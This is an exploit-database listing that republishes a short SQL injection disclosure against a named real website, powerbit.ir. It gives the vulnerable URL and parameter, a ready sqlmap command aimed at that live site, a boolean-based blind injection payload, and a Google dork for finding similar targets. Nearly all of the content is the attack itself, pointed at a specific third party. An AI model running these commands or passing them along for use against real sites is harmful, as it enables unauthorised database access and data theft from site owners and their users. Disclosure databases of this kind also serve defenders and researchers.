Advertisement






Powerbit.ir Web developer Sql injection

CVE Category Price Severity
N/A CWE-89 $5000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-15
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040077

Below is a copy:

Powerbit.ir Web developer Sql injection
# Exploit Title: Powerbit.ir SQL Injection Vulnerability
# Author: K0uR0sH3R
# Date: 15/04/2021
# Tested On: Kali Linux
# Contact: https://t.me/K0uR0sH3R
# Google Dork: intext:"          ."
----------------------------------------------------------------------------------------------------

# Vulnerable Path: http://powerbit.ir/postDetails?idposts=test

# python3 sqlmap.py -u "http://powerbit.ir/postDetails?idposts=test" -p "idposts" --risk="3" 


---
Parameter: idposts (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: idposts=-9146 OR 6723=6723
---

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.